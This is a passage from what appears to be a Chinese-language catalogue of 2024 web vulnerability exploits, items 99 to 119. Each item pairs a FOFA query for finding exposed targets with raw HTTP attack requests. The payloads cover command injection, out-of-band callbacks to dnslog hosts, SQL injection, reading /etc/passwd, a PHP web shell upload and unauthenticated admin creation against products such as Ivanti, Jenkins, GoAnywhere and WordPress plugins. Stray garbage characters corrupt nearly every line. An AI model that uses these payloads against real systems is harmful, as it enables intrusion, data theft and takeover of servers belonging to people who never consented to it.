# L6 _- B" |4 P% t& ~2 HAccept-Encoding: gzip, deflate
! M3 E$ C% b& ~2 G& TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- N* L, ~) d+ F3 t; l3 v
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
* `3 ~8 T$ b& T9 sX-Requested-With: XMLHttpRequest
# H$ E' B! R |! S7 b
" }8 K4 C& d! q0 Rid=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
2 y G7 G% d& g! z% ?7 C8 H4 k( m) f. ~# _$ r' g
2 F3 O4 _8 I1 Y2 Q# b/ ]$ ^
99. Ncast盈可视高清智能录播系统busiFacade RCE
+ I. k4 m- g3 s- QCVE-2024-03056 u9 R# t' @' h" Q( @3 ?6 I' o
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
& B4 o7 X( @* U- UPOST /classes/common/busiFacade.php HTTP/1.1& V7 R$ G H; j
Host: 192.168.40.130:8080
( m, `6 I. T2 b! k5 w) D7 MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0: e. S$ G1 C: z4 k, K ^: Z
Connection: close
7 J1 j8 v: k9 x; L! lContent-Length: 154; G) G& f: s0 T. c
Accept: */*) v5 W7 z& h4 g# E
Accept-Encoding: gzip, deflate
: e# p5 L i3 t! K; aAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 G. q# j# E' j3 FContent-Type: application/x-www-form-urlencoded; charset=UTF-8
+ S. j6 T7 `* EX-Requested-With: XMLHttpRequest
6 B8 n5 Y4 V2 V% h' ]3 ^+ n, }; H
; A6 ^" X# G( N* ~; Q; q%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
' G9 A$ H: }5 O! R" x# b# Y
: q# s. U4 v) y
- }( A+ v( a2 J5 B: c100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传; C: ?3 w$ O/ e& h$ ]. t
CVE-2024-0352 Z" |! S. \( m2 I a
FOFA:icon_hash="874152924"
8 n6 d" g: o& a, f/ Z8 |; _POST /api/file/formimage HTTP/1.1
1 }# _5 F8 ]9 p2 {Host: 192.168.40.1306 J) ^$ j4 N. H3 \6 p0 s
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
3 n0 m9 a; g; k& g# t. Y0 K. C: }, iConnection: close
) J6 ]2 n& l$ v7 |( d# y0 a+ Y* nContent-Length: 2019 `" v4 x1 E- h% Z/ q- p
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei0 { P6 ]) S6 ^; S% T
Accept-Encoding: gzip
. H* i; b+ C+ W# l& N/ h& h# W* F0 a% K; i' f: B2 d
------WebKitFormBoundarygcflwtei& s! P9 c5 a" C
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
; z) u4 T8 @8 s; A# r9 zContent-Type: application/x-php: t7 ?8 U& U( v3 x9 r s% y7 w& V
6 y8 B4 n9 K H6 |$ l- v2 C! k; C2ayyhRXiAsKXL8olvF5s4qqyI2O
% X9 ~9 y% `# Y4 s0 Z/ d------WebKitFormBoundarygcflwtei--
" x# J4 g% v6 z& O7 c# w
1 A: u& T8 Z. Q
& ~: K( u4 b+ s101. ivanti policy secure-22.6命令注入
& y9 a0 u! ], D0 V# @" vCVE-2024-21887
) _* G0 y+ N8 c( ^; {. _- @FOFA:body="welcome.cgi?p=logo"
) c1 W9 E" J* U- L R$ lGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
: Q! L4 f: Q3 {" GHost: x.x.x.xx.x.x.x2 c. f! z/ H7 a& Z% i8 V" Q7 ]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36! Y- W) s% G5 R: w
Connection: close/ E/ C7 J P8 G- w
Accept-Encoding: gzip" D, h6 e; E) E: p
6 C; W5 i) e# U5 A" U3 l$ i) \
3 \3 o! ]% G2 f, M3 U0 e102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
0 R" C/ W2 g% S. dCVE-2024-21893; u4 r: C/ m3 l# p6 ~: p
FOFA:body="welcome.cgi?p=logo"
) t- u" `8 ]- D$ ]POST /dana-ws/saml20.ws HTTP/1.1
$ n2 V& h. x0 B9 J$ _Host: x.x.x.x
* C; B0 S7 s; mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.360 \2 d- L2 ?4 P- C n
Connection: close0 G0 N, y. v* E: L" d2 B: h0 g
Content-Length: 792
6 ?4 o) r7 e; J/ q* kAccept-Encoding: gzip
- z V( J/ \% S6 G! K
+ g: @5 Q% Y0 F4 n- T S5 }( z: j o<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
v( x8 n2 h! i
9 j" L7 p4 I' m7 h9 c/ v103. Ivanti Pulse Connect Secure VPN XXE
" W# k; q8 c. H; f7 [! }: D, jCVE-2024-22024
# j3 d& h1 R" j- m aFOFA:body="welcome.cgi?p=logo"
* q' Y" c, \6 o) t+ m1 {POST /dana-na/auth/saml-sso.cgi HTTP/1.1
: [& x$ K1 r: H# i! WHost: 192.168.40.130:111
0 v! A+ k: T" _User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36: e W5 U, b0 d6 k4 {+ S l
Connection: close
' q( Y& \, E7 H+ s1 I% W+ \, GContent-Length: 204
6 g1 F8 E9 v2 t+ l8 iContent-Type: application/x-www-form-urlencoded
) T8 r& E9 P# D4 fAccept-Encoding: gzip
: ~& @2 Q4 ?6 t7 \9 a* L9 D3 H: P* q/ x/ H* `2 Y1 E* O
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
( Q. h4 H* [8 F. ~8 R6 E: p+ [9 L; {
7 B7 l* ~: v$ ` v5 H
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
& o- ^& w& Q9 Q ~1 U4 ]( i. Z<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
6 S( Y. ~ K' N/ D" e4 b
# U' y4 |1 N1 c& e; T+ b% q5 T1 S8 |/ m" X7 }. i2 h" t) } k
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露; S( A u/ l$ j/ @6 v
CVE-2024-0569- d" y+ }; e6 X: C( P, y4 ?
FOFA:title="TOTOLINK"' w4 @3 R+ k; S/ ^5 Z. A/ [
POST /cgi-bin/cstecgi.cgi HTTP/1.1
8 J7 F9 X& Y1 s2 AHost:192.168.0.1
$ d, {( k6 E/ cContent-Length:41
9 d) Y6 k% }" Q& k; o6 G* CAccept:application/json,text/javascript,*/*;q=0.01
, a& a0 c) \: ~X-Requested-with: XMLHttpRequest
. i8 R* h$ c4 V) y F) jUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
8 @, W/ l$ l U, }' p; l. _Content-Type: application/x-www-form-urlencoded:charset=UTF-8
! E8 A4 d1 `" f7 \Origin: http://192.168.0.13 Y) w( L/ O# G& Y+ N
Referer: http://192.168.0.1/advance/index.html?time=1671152380564. ~. p3 ]& i$ q. M: S5 Z6 h) P
Accept-Encoding:gzip,deflate( {2 W& F, V1 \1 y x1 E2 Q2 h" o) F
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7, H' L. [/ T- o5 {; a. p: A
Connection:close
" \8 J* w0 |# L9 l3 g) p! S/ \/ L" ~
7 u2 v7 G$ a- b{
. H! k% L2 f* b) b"topicurl":"getSysStatusCfg",
4 F8 f2 e# a' `! x8 A- p' M) y"token":""
9 b: b, G( i5 a1 v3 G' Q}
. W9 F8 N$ u# N( l
+ Q! A! m. a+ u* {; g' R105. SpringBlade v3.2.0 export-user SQL 注入
; y) S( e% n: E3 {0 vFOFA:body="https://bladex.vip"- g4 t3 K/ j6 S
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
: R7 C/ f7 p8 |9 H( J* G$ `2 z' c# [
106. SpringBlade dict-biz/list SQL 注入
0 `/ X6 P6 P0 k5 ^4 A: t( h7 ~6 lFOFA:body="Saber 将不能正常工作"7 s- H- P: H% I r+ r1 W
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1" |8 p2 Z+ f# W3 Q. k3 B3 G
Host: your-ip
! s- t/ k. h2 y$ q% N8 h1 GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' i) N5 F6 y5 ?
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A; n6 ]* q8 x1 q9 F9 `$ g! g
Accept-Encoding: gzip, deflate
4 \, @: X/ H! J9 I& H$ @. r* {& oAccept-Language: zh-CN,zh;q=0.9
, M8 y+ H& v: @1 Z$ I* IConnection: close* ~5 j$ R4 f9 [% j
) {7 e' X& h: L- t1 j0 p& n# J) L) M3 S8 ]6 h y- S
107. SpringBlade tenant/list SQL 注入
. h& T. O& D8 aFOFA:body="https://bladex.vip"! K. l, I/ }" R+ a" N' w( d5 l: n
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1/ e3 I6 ^; U& L8 p3 G0 v
Host: your-ip @( w( U+ W& Q( g# b, ?" E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36/ w% H' w, E8 B2 \' e( n
Blade-Auth:替换为自己的7 @3 T# r8 {- O4 Y! l
Connection: close; h1 t% R9 K7 l" V
! \% t; i. q0 c8 _
, U- c) X a6 x108. D-Tale 3.9.0 SSRF
c9 I5 k' d: L8 U3 ~CVE-2024-21642
6 D1 t7 w/ b3 `7 I" {; GFOFA:"dtale/static/images/favicon.png"
) K$ s4 [/ m. \: o- J7 {; J& eGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1# z2 O4 d8 E/ W* Q- d' J
Host: your-ip
" J$ k' K; I" t7 M; [" a" d* Y! LAccept: application/json, text/plain, */*. C+ H4 ^: g c' C& s+ N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36; x5 ~2 R/ \# g- h z6 W- K" _
Accept-Encoding: gzip, deflate, J: Y/ W) {" ]
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8% e/ i$ r2 i! n9 `0 f
Connection: close
& e) R- ^# ]& p
+ |( L Z0 W; b5 `5 i$ w5 w8 Q* Z- N; L4 E. Y3 c" o1 a
109. Jenkins CLI 任意文件读取: n8 j6 Y/ |: d& }
CVE-2024-238972 `; O3 u7 N; s; e: C
FOFA:header="X-Jenkins"7 [) j+ X2 s/ L1 y
POST /cli?remoting=false HTTP/1.1. L" t8 n" p/ i/ Z6 M. N
Host:
, G( E. R" o' IContent-type: application/octet-stream3 y7 w# ]; K$ q
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92& [( B1 H& g- W& j
Side: upload
) {( M: J" I _' CConnection: keep-alive
. W% m% G% e) _ I$ K- kContent-Length: 163
8 l* M- h' p) ]- g$ [) M4 u
/ S. _% L5 b' ] A3 z9 j; Q# Jb'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'( B S- f) _* I# G- j
5 ]6 g. P! c% b) [
) ?0 b" M# Z+ y& @( E$ O, V$ Y$ Z
POST /cli?remoting=false HTTP/1.1
9 a9 W+ |6 t1 e% `5 I2 \Host:
5 t2 x7 Y0 C# L% D# K9 u5 V( TSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
" c! y, l6 [7 w3 K7 fdownload- x [# M" y8 l$ o. x' [
Content-Type: application/x-www-form-urlencoded7 W. s0 m6 ~, c) ^1 |
Content-Length: 0
2 z9 G5 G% l% M$ _( E1 \
) M9 H5 T0 }6 ^4 X! x- |2 X5 y& p& ?5 M7 U% P; y7 W; f1 M0 p! q
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin, k& P! Y4 d, |
java -jar jenkins-cli.jar help+ C/ i( X$ [1 U, x
[COMMAND]
3 r( k `; i' Y) n. T& VLists all the available commands or a detailed description of single command., r" E( Y0 q* Z% z) i. I. S
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash); f1 L; U. T& V2 R% e. L
8 ] s; l8 q1 s. U$ m
# R; S3 Z" d& _6 I l- i110. Goanywhere MFT 未授权创建管理员5 s- x! e8 D' A
CVE-2024-0204
. r5 t) {5 H; x4 U( VFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"% v4 `1 E) X" _, s N
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.11 N {, y" `0 ~) P
Host: 192.168.40.130:8000
+ b2 Y5 C) T. L/ U3 e9 w' gUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.363 L: U6 f7 ^7 q3 I |
Connection: close
, A9 Q) n1 N( n/ c/ B% \Accept: */*
% J( z( X& J6 C+ ?4 f6 t6 SAccept-Language: en4 g& V# B0 X% B) g
Accept-Encoding: gzip' l& b& R4 A- n: g( @0 }% U
R5 d& ^. M( c" _9 I+ t" m3 a! Z- O- \* G; W. i) r+ o9 g l2 j
111. WordPress Plugin HTML5 Video Player SQL注入
0 [; w3 x& R$ r& P* eCVE-2024-10619 K; F% H! a" F1 \& N+ o7 d: i$ s
FOFA:"wordpress" && body="html5-video-player"
4 ]. t3 I2 N0 S3 c9 M# m% g4 eGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.14 g* h" k6 y3 ^/ \/ O q
Host: 192.168.40.130:112# G; `; a# {1 ]4 Z' r `6 T% J
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
( b$ `& _" n' ^8 DConnection: close: }3 p( g- s+ c- S7 v
Accept: */*
, V/ x# z s5 Y ?& KAccept-Language: en
. L% e+ R$ U: B+ ~0 W" l5 c# p6 KAccept-Encoding: gzip" s8 |5 Q3 z7 Z4 t9 I6 p' z
& `% k5 P$ ~# b: X; d5 r. P
; a. T* J) w* ?2 v8 ?; l. W3 l
112. WordPress Plugin NotificationX SQL 注入1 y4 c# t' [6 ?8 v) L
CVE-2024-1698
- G5 h: i! Z" I# PFOFA:body="/wp-content/plugins/notificationx". v7 ^+ y4 {5 i1 u0 q
POST /wp-json/notificationx/v1/analytics HTTP/1.1
2 a8 L8 d6 }; _- p, J1 @Host: {{Hostname}}5 f! x/ M w3 e1 M, U* x
Content-Type: application/json
/ C$ ~8 `1 B# i6 @* l3 R3 S% Y- u _' s
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}( D8 S" }# u, ]" l/ \0 c4 d8 {
3 ~3 a0 }& `* ^
* R. L2 t9 n2 p8 n, Y. g113. WordPress Automatic 插件任意文件下载和SSRF
/ L6 `( n" K; ^6 M8 h$ z& I' WCVE-2024-279540 N. L. m! y7 i0 @5 W" r
FOFA:"/wp-content/plugins/wp-automatic"
) k8 i2 r& f p, Q' ^+ E, eGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1" a- B% g( ?9 M* f U" q
Host: x.x.x.x! T2 p6 N6 w9 H: I% [
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
, O e, W- Z, O5 a. RConnection: close! s3 Q9 n5 ]& |+ D4 P. `( e
Accept: */*
9 R' y- X% D1 l6 ZAccept-Language: en* D2 {* B' Y$ ]0 c$ ]& V9 h
Accept-Encoding: gzip
/ y1 u7 K) M+ J
7 Y4 }( r4 s2 m1 P$ X* F) S
# x6 v& x2 l* O" u) }! N3 w114. WordPress MasterStudy LMS插件 SQL注入( i3 B+ ~' c" s2 h
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"* p7 f$ ?# b" ?; ~( @$ s2 Z
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
- d1 @, g0 f* W# ?9 WHost: your-ip v1 ~1 R1 g3 U, h1 H
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
5 h: l7 K- ~ a CAccept-Charset: utf-8- F% S0 `# G% q/ x1 |4 B
Accept-Encoding: gzip, deflate# i9 @2 |0 S; s: f
Connection: close5 y5 E, W' f' u! L1 b' L' H o
- x* e# T: U7 R- } n$ d4 D; Q O
) {/ \ K( O1 A" I8 @* L115. WordPress Bricks Builder <= 1.9.6 RCE7 [. C- H0 n2 r# H/ j, x9 V2 U
CVE-2024-25600
& t+ K- e: o: b# j$ N& O& r4 zFOFA: body="/wp-content/themes/bricks/"
# @# X9 P* |% n6 D第一步,获取网站的nonce值! f7 g2 ?* A' a( u
GET / HTTP/1.1
! U2 l2 K3 @. v7 N7 b9 OHost: x.x.x.x: B/ o: K* r+ k( B9 w, }
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
5 ?! S7 i+ j1 M$ p' L4 R L' G BConnection: close
" ]7 t% A7 {) w6 SAccept-Encoding: gzip9 o6 m$ P9 k; ]1 z' f6 A( \
8 o% I" S: c& B7 `3 Y: m% W
' r; a! `$ Z6 J
第二步替换nonce值,执行命令* \) W, z! h6 @5 J# S$ q
POST /wp-json/bricks/v1/render_element HTTP/1.1
. ?) \5 p+ J4 p/ nHost: x.x.x.x- X2 V) i2 i6 T3 `0 S- `) A7 v, x2 p
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
8 x( Q: \+ Q! [5 @. X! S6 tConnection: close
3 B7 Q; H7 f6 E& E# d8 a: QContent-Length: 356# y, n! @6 y$ | L& c; N
Content-Type: application/json3 E+ T' h o' w% G% W# I# C/ |
Accept-Encoding: gzip; o/ K3 o2 a5 Y; @4 i+ ~
* G* f( ~( {* M# z& _
{
W$ d5 i" F4 f2 S W3 i"postId": "1",; C2 [" a7 ~; |- {
"nonce": "第一步获得的值",1 y R8 r6 }' `
"element": {
+ j4 t: r# M# m& ` "name": "container",
3 H' g( a& C5 }4 R& S) a6 Y "settings": { y$ S6 `8 Q0 [4 G# J6 T3 i
"hasLoop": "true",2 Z* H0 s o2 j5 ]9 [
"query": {
7 B) B2 G) `" P/ V8 Z. l8 K "useQueryEditor": true,
* D' w4 k# B- ^2 r "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);"," K% k @# S8 P- j
"objectType": "post"- W1 |/ S$ G' V5 G, W+ `
}+ I: k' q9 ?% n" ?( m6 G
}9 H5 ~+ m2 a+ B
}% T1 F1 F- k( w B
}3 q" |& Z5 q" r3 H
5 I: w& I2 ?- c% V# B* B
1 c9 A) ^+ S6 D0 ^* O9 s) W( L116. wordpress js-support-ticket文件上传6 d8 |4 Y, N3 W. N! f% f* a
FOFA:body="wp-content/plugins/js-support-ticket"' j2 ] d: x) R7 f! n$ {4 n
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.12 d$ ~7 u0 _1 G4 ?7 B& A) l
Host:; T, X( k+ W+ ~0 }: r
Content-Type: multipart/form-data; boundary=--------767099171& }8 N+ l4 A m& f* l6 t8 g: s, ~# d( R
User-Agent: Mozilla/5.0
, a. ]" y; D) O% p- p L5 Y
9 c. `- f" E* Q# p2 C" }7 h+ m----------767099171( s3 b0 G3 n+ Q; |. V0 \: {' N. m
Content-Disposition: form-data; name="action"
5 [! B/ p! q4 e1 M* D( z4 Kconfiguration_saveconfiguration. q) ~- M5 Q8 Y; b M
----------7670991719 [/ P' J: D1 y
Content-Disposition: form-data; name="form_request"0 m- _+ S# R/ S/ M; M5 h6 U& A z
jssupportticket
; X; f3 ^7 X% o9 D----------767099171
* u! j* Y- y! Q: v' OContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
, F/ Y! x! q4 F ?) E1 {Content-Type: image/png5 o3 r; [, J3 u
----------767099171--( ~1 W2 N5 g; l0 \4 s6 @% b
/ `: H7 i9 A+ o( H5 `5 i, L( M# T9 Z! o+ n
117. WordPress LayerSlider插件SQL注入
$ L- o. \* D0 |" [+ ?9 j( a3 A% Wversion:7.9.11 – 7.10.0, k% T: p$ ~% Q) V" }/ s
FOFA:body="/wp-content/plugins/LayerSlider/"# Q$ @0 I3 A. p
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
* M9 F8 {. n2 k3 W( ^4 w" ~Host: your-ip, U. K; J8 |0 B) a$ P6 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
0 u+ _/ H, R( f5 v, ~. [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ G f$ h O6 ]. m% gAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
/ s i- I O. J) D6 `Accept-Encoding: gzip, deflate, br+ l& U& T6 ^3 T9 |3 A% c! q
Connection: close
p; A8 t" Z5 _2 {6 c9 U& S7 W( R3 nUpgrade-Insecure-Requests: 1. ]1 r# ~ r+ Z+ x, v0 s
1 q5 J6 D1 }0 z
$ p# D' z. P2 Z9 ?/ @2 x% }% v( y2 _118. 北京百绰智能S210管理平台uploadfile.php任意文件上传2 G' Y" `" z4 o6 N
CVE-2024-0939
3 }# D3 w& d3 C# Q j0 A& SFOFA:title="Smart管理平台"
* {! r& ], j. W( M" e$ F9 P, g) [POST /Tool/uploadfile.php? HTTP/1.1
, L; [$ x: O. e$ ZHost: 192.168.40.130:84432 G3 o/ C8 Y+ \6 a2 M/ J! e2 f
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f82 q: s. g' u3 l* Q* k+ p+ G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
) M, A5 k9 H3 p) aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ W( Y: {" Z9 H5 p: W* y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! J7 x5 I: z& ]' H' _7 L5 n
Accept-Encoding: gzip, deflate8 P+ q4 ^: L% M w% b4 f$ W
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
& C, ^- `1 o3 X( uContent-Length: 405
+ q9 U6 E! q3 q3 d* U8 NOrigin: https://192.168.40.130:8443
. U- ]) \8 V+ {! ]+ g9 [1 hReferer: https://192.168.40.130:8443/Tool/uploadfile.php) S7 Z/ B' p5 n6 G1 A
Upgrade-Insecure-Requests: 1+ E' y% ^/ M% @. j. x
Sec-Fetch-Dest: document3 |; k( F- ?' K, e4 J
Sec-Fetch-Mode: navigate
# k0 S0 p+ `/ |, V# X0 g4 fSec-Fetch-Site: same-origin
. U6 e$ C$ w6 J" E# h5 }/ ?/ `Sec-Fetch-User: ?1
% c; w3 L# ] J2 dTe: trailers
+ A' Y4 k1 ?& t. D* BConnection: close. k2 s( t" Z, J- A' R& `% J
; E! j, ?$ O. ~5 j% H+ w- i" I9 C-----------------------------13979701222747646634037182887
( _: r/ u, G4 a( uContent-Disposition: form-data; name="file_upload"; filename="contents.php"
* ~3 x$ C B3 J8 ~Content-Type: application/octet-stream
* c" ^$ E' i9 T* Y* X: R& N& H
# w0 y5 v/ X8 }. u- o9 g<?php/ H/ [2 n! r. L6 W M" h& A
system($_POST["passwd"]);. K1 V; X* p5 }% g: Q1 j. C
?>
) ]0 }. L) V' T/ G F9 h$ J) o& \-----------------------------139797012227476466340371828870 ]. G" ~' q9 {6 Y) w, _4 F( a
Content-Disposition: form-data; name="txt_path"1 Q7 P9 {! J; z: H. P
4 C* s& I& c; p/home/src.php
& X2 h( b0 J7 [) I$ i7 ~-----------------------------13979701222747646634037182887--
: u; n5 j' e- d8 J- W, s
& r; }; f7 A3 @( p+ v
1 m$ m2 c$ y8 n3 J访问/home/src.php
- ?4 |& [* J+ r/ d( ?
2 a# f" Q$ F% C* @/ `; @% M, ]4 w1 `119. 北京百绰智能S20后台sysmanageajax.php sql注入
- L" i' {# \7 p( [CVE-2024-1254
& g' b- a' Q% WFOFA:title="Smart管理平台"
' [, U6 f2 _% C先登录进入系统,默认账号密码为admin/admin" ^: W7 i! v0 e3 c
POST /sysmanage/sysmanageajax.php HTTP/1.11; r( X b/ V( K
Host: x.x.x.x' Y- ]7 D$ u5 N# _! n/ ~+ p1 G
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee6 I& e2 J1 Y) z; d7 m9 q$ T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
1 n2 W6 _2 r2 D. s: tAccept: */*" o6 ?# b7 s8 ]0 _' A
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
' x) G* E/ C' iAccept-Encoding: gzip, deflate# Y* k- B5 ?& s
Content-Type: application/x-www-form-urlencoded;/ K% N( Z# j# ]) t
Content-Length: 109
& W! C$ n. L7 x/ HOrigin: https://58.18.133.60:8443! M' a# X7 i/ e: b8 M7 e
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
( ^1 [% ^6 N6 F. WSec-Fetch-Dest: empty- n% F Q' {7 B# q3 M G" n
Sec-Fetch-Mode: cors; i( f! G/ S6 Q- V
Sec-Fetch-Site: same-origin
* n* H6 Y5 D2 `" SX-Forwarded-For: 1.1.1.14 d: P3 v4 J0 V, y
X-Originating-Ip: 1.1.1.1
! m6 @+ w) K% Z( D3 c0 }8 EX-Remote-Ip: 1.1.1.13 G! e5 q! I! j
X-Remote-Addr: 1.1.1.1+ a1 @7 |( d; v* n2 @5 b
